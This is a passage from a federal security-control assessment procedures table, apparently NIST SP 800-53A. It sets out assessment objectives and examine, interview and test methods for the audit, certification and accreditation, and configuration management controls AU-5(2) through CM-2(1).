| Test: [SELECT FROM: Automated mechanisms implementing audit storage limit warnings]. (H) | |
| AU-5(2) | RESPONSE TO AUDIT PROCESSING FAILURES |
| Control Enhancement: | |
| The information system provides a real-time alert when the following audit failure events occur: [Assignment: organization-defined audit failure events requiring real-time alerts]. | |
| AU-5(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, audit failure events requiring real-time alerts; and | |
| (ii) the information system provides a real-time alert when organization-defined audit failure events occur. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing response to audit processing failures; information system design documentation; security plan; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing real time audit alerts]. (H) |
| ASSESSMENT PROCEDURE | |
| AU-6 | AUDIT MONITORING, ANALYSIS, AND REPORTING |
| Control: The organization regularly reviews/analyzes information system audit records for indications of inappropriate or unusual activity, investigates suspicious activity or suspected violations, reports findings to appropriate officials, and takes necessary actions. | |
| Supplemental Guidance: Organizations increase the level of audit monitoring and analysis activity within the information system whenever there is an indication of increased risk to organizational operations, organizational assets, or individuals based on law enforcement information, intelligence information, or other credible sources of information. | |
| AU-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization regularly reviews/analyzes audit records for indications of inappropriate or unusual activity; | |
| (ii) the organization investigates suspicious activity or suspected violations; | |
| (iii) the organization reports findings of inappropriate/unusual activities, suspicious behavior, or suspected violations to appropriate officials; and | |
| (iv) the organization takes necessary actions in response to the reviews/analyses of audit records. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit monitoring, analysis, and reporting; reports of audit findings; records of actions taken in response to reviews/analyses of audit records; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Information system audit monitoring, analysis, and reporting capability]. (H) | |
| AU-6.2 | ASSESSMENT OBJECTIVE: |
| Determine if the organization increases the level of audit monitoring and analysis activity whenever there is increased risk to organizational operations and assets, or to individuals, based on information from law enforcement organizations, the intelligence community, or other credible sources. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit monitoring, analysis, and reporting; threat information documentation from law enforcement, intelligence community, or other sources; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system audit monitoring, analysis, and reporting responsibilities]. (H) | |
| AU-6(1) | AUDIT MONITORING, ANALYSIS, AND REPORTING |
| Control Enhancement: | |
| The organization employs automated mechanisms to integrate audit monitoring, analysis, and reporting into an overall process for investigation and response to suspicious activities. | |
| AU-6(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to integrate audit monitoring, analysis, and reporting into an overall process for investigation and response to suspicious activities. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit monitoring, analysis, and reporting; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system audit monitoring, analysis, and reporting responsibilities]. (H) | |
| Test: [SELECT FROM: Automated mechanisms integrating audit monitoring, analysis, and reporting into an organizational process for investigation and response to suspicious activities]. (H) | |
| AU-6(2) | AUDIT MONITORING, ANALYSIS, AND REPORTING |
| Control Enhancement: | |
| The organization employs automated mechanisms to alert security personnel of the following inappropriate or unusual activities with security implications: [Assignment: organization- defined list of inappropriate or unusual activities that are to result in alerts]. | |
| AU-6(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, inappropriate or unusual activities with security implications; and | |
| (ii) the organization employs automated mechanisms to alert security personnel of the occurrence of any organization-defined inappropriate or unusual activities with security implications. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit monitoring, analysis, and reporting; information system design documentation; information system configuration settings and associated documentation; security plan; information system audit records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system audit monitoring, analysis, and reporting responsibilities]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing security alerts]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| AU-7 | AUDIT REDUCTION AND REPORT GENERATION |
| Control: The information system provides an audit reduction and report generation capability. | |
| Supplemental Guidance: Audit reduction, review, and reporting tools support after-the-fact investigations of security incidents without altering original audit records. | |
| AU-7.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system provides audit reduction and report generation tools that support after-the-fact investigations of security incidents without altering original audit records. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit reduction and report generation; information system design documentation; audit reduction, review, and reporting tools; information system audit records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system audit monitoring, analysis, and reporting responsibilities]. (M) (H) | |
| Test: [SELECT FROM: Audit reduction and report generation capability]. (M) (H) | |
| AU-7(1) | AUDIT REDUCTION AND REPORT GENERATION |
| Control Enhancement: | |
| The information system provides the capability to automatically process audit records for events of interest based upon selectable, event criteria. | |
| AU-7(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system provides the capability to automatically process audit records for events of interest based upon selectable, event criteria. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit reduction and report generation; information system design documentation; information system configuration settings and associated documentation; audit reduction, review, and reporting tools; information system audit records; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Audit reduction and report generation capability]. (H) |
| ASSESSMENT PROCEDURE | |
| AU-8 | TIME STAMPS |
| Control: The information system provides time stamps for use in audit record generation. | |
| Supplemental Guidance: Time stamps (including date and time) of audit records are generated using internal system clocks. | |
| AU-8.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system provides time stamps in audit records. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing time stamp generation; information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing time stamp generation]. (M) (H) | |
| AU-8(1) | TIME STAMPS |
| Control Enhancement: | |
| The organization synchronizes internal information system clocks [Assignment: organization- defined frequency]. | |
| AU-8(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the frequency of internal clock synchronization for the information system; and | |
| (ii) the organization synchronizes internal information system clocks periodically in accordance with organization-defined frequency. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing time stamp generation; security plan; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing internal information system clock synchronization]. (H) |
| ASSESSMENT PROCEDURE | |
| AU-9 | PROTECTION OF AUDIT INFORMATION |
| Control: The information system protects audit information and audit tools from unauthorized access, modification, and deletion. | |
| Supplemental Guidance: Audit information includes all information (e.g., audit records, audit settings, and audit reports) needed to successfully audit information system activity. | |
| AU-9.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system protects audit information and audit tools from unauthorized access, modification, and deletion. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing protection of audit information; access control policy and procedures; information system design documentation; information system configuration settings and associated documentation, information system audit records; audit tools; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing audit information protection]. (H) | |
| AU-9(1) | PROTECTION OF AUDIT INFORMATION |
| Control Enhancement: | |
| The information system produces audit records on hardware-enforced, write-once media. | |
| AU-9(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system produces audit information on hardware-enforced, write-once media. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing protection of audit information; access control policy and procedures; information system design documentation; information system hardware settings; information system configuration settings and associated documentation, information system audit records; other relevant documents or records]. | |
| Test: [SELECT FROM: Media storage devices]. |
| ASSESSMENT PROCEDURE | |
| AU-10 | NON-REPUDIATION |
| Control: The information system provides the capability to determine whether a given individual took a particular action. | |
| Supplemental Guidance: Examples of particular actions taken by individuals include creating information, sending a message, approving information (e.g., indicating concurrence or signing a contract), and receiving a message. Non-repudiation protects against later false claims by an individual of not having taken a specific action. Non- repudiation protects individuals against later claims by an author of not having authored a particular document, a sender of not having transmitted a message, a receiver of not having received a message, or a signatory of not having signed a document. Non- repudiation services can be used to determine if information originated from an individual, or if an individual took specific actions (e.g., sending an email, signing a contract, approving a procurement request) or received specific information. Non- repudiation services are obtained by employing various techniques or mechanisms (e.g., digital signatures, digital message receipts, time stamps). | |
| AU-10.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system provides the capability to determine whether a given individual took a particular action (e.g., created information, sent a message, approved information [e.g., to indicate concurrence or sign a contract] or received a message). | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing non-repudiation; information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms implementing non-repudiation capability]. |
| ASSESSMENT PROCEDURE | |
| AU-11 | AUDIT RECORD RETENTION |
| Control: The organization retains audit records for [Assignment: organization-defined time period] to provide support for after-the-fact investigations of security incidents and to meet regulatory and organizational information retention requirements. | |
| Supplemental Guidance: The organization retains audit records until it is determined that they are no longer needed for administrative, legal, audit, or other operational purposes. This includes, for example, retention and availability of audit records relative to Freedom of Information Act (FOIA) requests, subpoena, and law enforcement actions. Standard categorizations of audit records relative to such types of actions and standard response processes for each type of action are developed and disseminated. NIST Special Publication 800-61 provides guidance on computer security incident handling and audit record retention. | |
| AU-11.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines the retention period for audit records generated by the information system; and | |
| (ii) the organization retains information system audit records for the organization- defined time period to provide support for after-the-fact investigations of security incidents and to meet regulatory and organizational information retention requirements. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit record retention; organization-defined retention period for audit records; information system audit records; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system audit record retention responsibilities]. (H) |
FAMILY:
Certification, Accreditation, and Security Assessments
| ASSESSMENT PROCEDURE | |
| CA-1 | CERTIFICATION, ACCREDITATION, AND SECURITY ASSESSMENT POLICIES AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) formal, documented, security assessment and certification and accreditation policies that address purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the security assessment and certification and accreditation policies and associated assessment, certification, and accreditation controls. | |
| Supplemental Guidance: The security assessment and certification and accreditation policies and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The security assessment and certification and accreditation policies can be included as part of the general information security policy for the organization. Security assessment and certification and accreditation procedures can be developed for the security program in general, and for a particular information system, when required. The organization defines what constitutes a significant change to the information system to achieve consistent security reaccreditations. NIST Special Publication 800-53A provides guidance on security control assessments. NIST Special Publication 800-37 provides guidance on security certification and accreditation. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| CA-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents security assessment and certification and accreditation policies and procedures; | |
| (ii) the organization disseminates security assessment and certification and accreditation policies and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review policy and procedures; and | |
| (iv) the organization updates security assessment and certification and accreditation policies and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security assessment and certification and accreditation policies and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with security assessment and certification and accreditation responsibilities]. (H) | |
| CA-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the security assessment and certification and accreditation policies address purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the security assessment and certification and accreditation policies are consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the security assessment and certification and accreditation procedures address all areas identified in the security assessment and certification and accreditation policies and address achieving policy-compliant implementations of all associated security assessment and certification and accreditation controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security assessment and certification and accreditation policies and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with security assessment and certification and accreditation responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| CA-2 | SECURITY ASSESSMENTS |
| Control: The organization conducts an assessment of the security controls in the information system [Assignment: organization-defined frequency, at least annually] to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system. | |
| Supplemental Guidance: This control is intended to support the FISMA requirement that the management, operational, and technical controls in each information system contained in the inventory of major information systems be assessed with a frequency depending on risk, but no less than annually. The FISMA requirement for (at least) annual security control assessments should not be interpreted by organizations as adding additional assessment requirements to those requirements already in place in the security certification and accreditation process. To satisfy the annual FISMA assessment requirement, organizations can draw upon the security control assessment results from any of the following sources, including but not limited to: (i) security certifications conducted as part of an information system accreditation or reaccreditation process (see CA-4); (ii) continuous monitoring activities (see CA-7); or (iii) testing and evaluation of the information system as part of the ongoing system development life cycle process (provided that the testing and evaluation results are current and relevant to the determination of security control effectiveness). Existing security assessment results are reused to the extent that they are still valid and are supplemented with additional assessments as needed. Reuse of assessment information is critical in achieving a broad- based, cost-effective, and fully integrated security program capable of producing the needed evidence to determine the actual security status of the information system. | |
| OMB does not require an annual assessment of all security controls employed in an organizational information system. In accordance with OMB policy, organizations must annually assess a subset of the security controls based on: (i) the FIPS 199 security categorization of the information system; (ii) the specific security controls selected and employed by the organization to protect the information system; and (iii) the level of assurance (or confidence) that the organization must have in determining the effectiveness of the security controls in the information system. It is expected that the organization will assess all of the security controls in the information system during the three-year accreditation cycle. The organization can use the current year's assessment results obtained during security certification to meet the annual FISMA assessment requirement (see CA-4). NIST Special Publication 800-53A provides guidance on security control assessments to include reuse of existing assessment results. Related security controls: CA-4, CA-6, CA-7, SA-11. | |
| CA-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the frequency of security control assessments and the frequency is at least annually; and | |
| (ii) the organization conducts an assessment of the security controls in the information system at an organization-defined frequency. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security assessment policy; procedures addressing security assessments; security plan; security assessment plan; security assessment report; assessment evidence; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| CA-3 | INFORMATION SYSTEM CONNECTIONS |
| Control: The organization authorizes all connections from the information system to other information systems outside of the accreditation boundary through the use of system connection agreements and monitors/controls the system connections on an ongoing basis. | |
| Supplemental Guidance: Since FIPS 199 security categorizations apply to individual information systems, the organization carefully considers the risks that may be introduced when systems are connected to other information systems with different security requirements and security controls, both within the organization and external to the organization. Risk considerations also include information systems sharing the same networks. NIST Special Publication 800-47 provides guidance on connecting information systems. Related security controls: SC-7, SA-9. | |
| CA-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies all connections to external information systems (i.e., information systems outside of the accreditation boundary); | |
| (ii) the organization authorizes all connections from the information system to external information systems through the use of system connection agreements; and | |
| (iii) the organization monitors/controls the system interconnections on an ongoing basis. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing information system connections; NIST Special Publication 800-47; system and communications protection policy; personnel security policy; information system connection agreements; security plan; information system design documentation; information system configuration management and control documentation; security assessment report; plan of action and milestones; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibility for developing, implementing, or approving information system connection agreements]. (H) |
| ASSESSMENT PROCEDURE | |
| CA-4 | SECURITY CERTIFICATION |
| Control: The organization conducts an assessment of the security controls in the information system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system. | |
| Supplemental Guidance: A security certification is conducted by the organization in support of the [[OMB Circular A-130, Appendix III]] requirement for accrediting the information system. The security certification is a key factor in all security accreditation (i.e., authorization) decisions and is integrated into and spans the system development life cycle. The organization assesses all security controls in an information system during the initial security accreditation. Subsequent to the initial accreditation and in accordance with OMB policy, the organization assesses a subset of the controls annually during continuous monitoring (see CA-7). The organization can use the current year's assessment results obtained during security certification to meet the annual FISMA assessment requirement (see CA-2). NIST Special Publication 800-53A provides guidance on security control assessments. NIST Special Publication 800-37 provides guidance on security certification and accreditation. Related security controls: CA-2, CA-6, SA-11. | |
| CA-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization conducts an assessment of the security controls in the information system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system; and | |
| (ii) the organization employs a security certification process in accordance with OMB policy and NIST Special Publications 800-37 and 800-53A. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing security certification; security plan; security assessment plan; security assessment report; assessment evidence; plan of action and milestones; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with security certification responsibilities]. (H) | |
| CA-4(1) | SECURITY CERTIFICATION |
| Control Enhancement: | |
| The organization employs an independent certification agent or certification team to conduct an assessment of the security controls in the information system. | |
| Enhancement Supplemental Guidance: An independent certification agent or certification team is any individual or group capable of conducting an impartial assessment of an organizational information system. Impartiality implies that the assessors are free from any perceived or actual conflicts of interest with respect to the developmental, operational, and/or management chain of command associated with the information system or to the determination of security control effectiveness. Independent security certification services can be obtained from other elements within the organization or can be contracted to a public or private sector entity outside of the organization. Contracted certification services are considered independent if the information system owner is not directly involved in the contracting process or cannot unduly influence the independence of the certification agent or certification team conducting the assessment of the security controls in the information system. The authorizing official decides on the required level of certifier independence based on the criticality and sensitivity of the information system and the ultimate risk to organizational operations and organizational assets, and to individuals. The authorizing official determines if the level of certifier independence is sufficient to provide confidence that the assessment results produced are sound and can be used to make a credible, risk-based decision. In special situations, for example when the organization that owns the information system is small or the organizational structure requires that the assessment of the security controls be accomplished by individuals that are in the developmental, operational, and/or management chain of the system owner or authorizing official, independence in the certification process can be achieved by ensuring the assessment results are carefully reviewed and analyzed by an independent team of experts to validate the completeness, consistency, and veracity of the results. The authorizing official should consult with the Office of the Inspector General, the senior agency information security officer, and the chief information officer to fully discuss the implications of any decisions on certifier independence in the types of special circumstances described above. | |
| CA-4(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs an independent certification agent or certification team to conduct an assessment of the security controls in the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing security certification; security accreditation package (including security plan, security assessment report, plan of action and milestones, authorization statement); other relevant documents or records]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| CA-5 | PLAN OF ACTION AND MILESTONES |
| Control: The organization develops and updates [Assignment: organization-defined frequency], a plan of action and milestones for the information system that documents the organization's planned, implemented, and evaluated remedial actions to correct deficiencies noted during the assessment of the security controls and to reduce or eliminate known vulnerabilities in the system. | |
| Supplemental Guidance: The plan of action and milestones is a key document in the security accreditation package developed for the authorizing official and is subject to federal reporting requirements established by OMB. The plan of action and milestones updates are based on the findings from security control assessments, security impact analyses, and continuous monitoring activities. OMB FISMA reporting guidance contains instructions regarding organizational plans of action and milestones. NIST Special Publication 800-37 provides guidance on the security certification and accreditation of information systems. NIST Special Publication 800-30 provides guidance on risk mitigation. | |
| CA-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops a plan of action and milestones for the information system; | |
| (ii) the plan of action and milestones documents the planned, implemented, and evaluated remedial actions by the organization to correct deficiencies noted during the assessment of the security controls and to reduce or eliminate known vulnerabilities in the system; | |
| (iii) the organization defines in the security plan, explicitly or by reference, the frequency of plan of action and milestone updates; and | |
| (iv) the organization updates the plan of action and milestones at an organization- defined frequency. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing plan of action and milestones; security plan; security assessment plan; security assessment report; assessment evidence; plan of action and milestones; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with plan of action and milestones development and implementation responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| CA-6 | SECURITY ACCREDITATION |
| Control: The organization authorizes (i.e., accredits) the information system for processing before operations and updates the authorization [Assignment: organization-defined frequency, at least every three years] or when there is a significant change to the system. A senior organizational official signs and approves the security accreditation. | |
| Supplemental Guidance: [[OMB Circular A-130, Appendix III]], establishes policy for security accreditations of federal information systems. The organization assesses the security controls employed within the information system before and in support of the security accreditation. Security assessments conducted in support of security accreditations are called security certifications. The security accreditation of an information system is not a static process. Through the employment of a comprehensive continuous monitoring process (the fourth and final phase of the certification and accreditation process), the critical information contained in the accreditation package (i.e., the system security plan, the security assessment report, and the plan of action and milestones) is updated on an ongoing basis providing the authorizing official and the information system owner with an up-to-date status of the security state of the information system. To reduce the administrative burden of the three-year reaccreditation process, the authorizing official uses the results of the ongoing continuous monitoring process to the maximum extent possible as the basis for rendering a reaccreditation decision. NIST Special Publication 800-37 provides guidance on the security certification and accreditation of information systems. Related security controls: CA-2, CA-4, CA-7. | |
| CA-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the frequency of authorization updates, not to exceed three years; | |
| (ii) the organization authorizes (i.e., accredits) the information system for processing before operations and updates the authorization at an organization-defined frequency or when there is a significant change to the information system; | |
| (iii) a senior organizational official signs and approves the security accreditation; and | |
| (iv) the security accreditation process employed by the organization is consistent with NIST Special Publications 800-37. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing security accreditation; NIST Special Publication 800-37; security accreditation package (including security plan; security assessment report; plan of action and milestones; authorization statement); other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with security accreditation responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| CA-7 | CONTINUOUS MONITORING |
| Control: The organization monitors the security controls in the information system on an ongoing basis. | |
| Supplemental Guidance: Continuous monitoring activities include configuration management and control of information system components, security impact analyses of changes to the system, ongoing assessment of security controls, and status reporting. The organization assesses all security controls in an information system during the initial security accreditation. Subsequent to the initial accreditation and in accordance with OMB policy, the organization assesses a subset of the controls annually during continuous monitoring. The selection of an appropriate subset of security controls is based on: (i) the FIPS 199 security categorization of the information system; (ii) the specific security controls selected and employed by the organization to protect the information system; and (iii) the level of assurance (or grounds for confidence) that the organization must have in determining the effectiveness of the security controls in the information system. The organization establishes the selection criteria and subsequently selects a subset of the security controls employed within the information system for assessment. The organization also establishes the schedule for control monitoring to ensure adequate coverage is achieved. Those security controls that are volatile or critical to protecting the information system are assessed at least annually. All other controls are assessed at least once during the information system's three-year accreditation cycle. The organization can use the current year's assessment results obtained during continuous monitoring to meet the annual FISMA assessment requirement (see CA-2). | |
| This control is closely related to and mutually supportive of the activities required in monitoring configuration changes to the information system. An effective continuous monitoring program results in ongoing updates to the information system security plan, the security assessment report, and the plan of action and milestones—the three principle documents in the security accreditation package. A rigorous and well executed continuous monitoring process significantly reduces the level of effort required for the reaccreditation of the information system. NIST Special Publication 800-37 provides guidance on the continuous monitoring process. NIST Special Publication 800-53A provides guidance on the assessment of security controls. Related security controls: CA- 2, CA-4, CA-5, CA-6, CM-4. | |
| CA-7.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization monitors the security controls in the information system on an ongoing basis; and | |
| (ii) the organization employs a security control monitoring process consistent with NIST Special Publications 800-37 and 800-53A. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing continuous monitoring of information system security controls; NIST Special Publications 800-37 and 800-53A; security plan; security assessment report; plan of action and milestones; information system monitoring records; security impact analyses; status reports; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with continuous monitoring responsibilities]. (H) | |
| CA-7.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization conducts security impact analyses on changes to the information system; | |
| (ii) the organization documents and reports changes to or deficiencies in the security controls employed in the information system; and | |
| (iii) the organization makes adjustments to the information system security plan and plan of action and milestones, as appropriate, based on the activities associated with continuous monitoring of the security controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing continuous monitoring of information system security controls; security plan; security assessment report; plan of action and milestones; information system monitoring records; security impact analyses; status reports; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with continuous monitoring responsibilities]. (M) (H) | |
| CA-7(1) | CONTINUOUS MONITORING |
| Control Enhancement: | |
| The organization employs an independent certification agent or certification team to monitor the security controls in the information system on an ongoing basis. | |
| Enhancement Supplemental Guidance: The organization can extend and maximize the value of the ongoing assessment of security controls during the continuous monitoring process by requiring an independent certification agent or team to assess all of the security controls during the information system's three-year accreditation cycle. Related security controls: CA-2, CA-4, CA-5, CA-6, CM-4. | |
| CA-7(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs an independent certification agent or certification team to monitor the security controls in the information system on an ongoing basis. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing continuous monitoring of information system security controls; security plan; security assessment report; plan of action and milestones; information system monitoring records; security impact analyses; status reports; other relevant documents or records]. | |
| Interview: [SELECT FROM: Organizational personnel with continuous monitoring responsibilities]. |
FAMILY:
Configuration Management
| ASSESSMENT PROCEDURE | |
| CM-1 | CONFIGURATION MANAGEMENT POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, configuration management policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the configuration management policy and associated configuration management controls. | |
| Supplemental Guidance: The configuration management policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The configuration management policy can be included as part of the general information security policy for the organization. Configuration management procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| CM-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents configuration management policy and procedures; | |
| (ii) the organization disseminates configuration management policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review configuration management policy and procedures; and | |
| (iv) the organization updates configuration management policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with configuration management and control responsibilities]. (H) | |
| CM-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the configuration management policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the configuration management policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the configuration management procedures address all areas identified in the configuration management policy and address achieving policy-compliant implementations of all associated configuration management controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with configuration management and control responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| CM-2 | BASELINE CONFIGURATION |
| Control: The organization develops, documents, and maintains a current baseline configuration of the information system. | |
| Supplemental Guidance: This control establishes a baseline configuration for the information system. The baseline configuration provides information about a particular component's makeup (e.g., the standard software load for a workstation or notebook computer including updated patch information) and the component's logical placement within the information system architecture. The baseline configuration also provides the organization with a well-defined and documented specification to which the information system is built and deviations, if required, are documented in support of mission needs/objectives. The baseline configuration of the information system is consistent with the Federal Enterprise Architecture. Related security controls: CM-6, CM-8. | |
| CM-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents a baseline configuration of the information system that is consistent with the Federal Enterprise Architecture, shows relationships among information system components, and provides a well- defined and documented specification to which the information system is built; | |
| (ii) the organization maintains the baseline configuration; and | |
| (iii) the organization documents deviations from the baseline configuration, in support of mission needs/objectives. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Configuration management policy; procedures addressing the baseline configuration of the information system; Federal Enterprise Architecture documentation; information system design documentation; information system architecture and configuration documentation; other relevant documents or records]. (L) (M) (H) | |
| CM-2(1) | BASELINE CONFIGURATION |
| Control Enhancement: | |
| The organization updates the baseline configuration of the information system as an integral part of information system component installations. | |
| CM-2(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization updates the baseline configuration of the information system as an integral part of information system component installations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
